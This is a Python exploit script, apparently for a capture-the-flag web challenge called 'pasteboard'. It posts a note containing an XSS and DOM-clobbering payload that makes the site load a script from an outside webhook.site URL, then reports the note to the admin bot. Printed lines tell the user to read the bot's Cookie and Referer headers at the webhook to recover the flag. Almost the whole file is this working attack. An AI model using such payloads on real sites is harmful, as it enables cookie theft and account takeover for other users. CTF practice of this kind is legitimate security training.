import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# The img onerror happens AFTER handleError already ran
# So we can't modify the value dynamically
# BUT - we could use a different approach: use a getter!

# Or... what if the flag is already in the page somehow?
# Let's try to exfiltrate via HTTP headers (Referer)

payload = f'''<form id="errorReporter"><input name="path" value="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/exfil.js"></form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

print("[*] Since dynamic modification doesn't work,")
print("[*] let's check if the flag comes through HTTP headers...")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Check Headers", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    print(f"[+] Reported: {report.status_code == 202}")
    print()
    print("[*] Check webhook for /exfil.js request")
    print("[*] Look at ALL headers, especially:")
    print("    - Cookie header")
    print("    - Referer header")
    print("    - User-Agent")
    print()
    print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")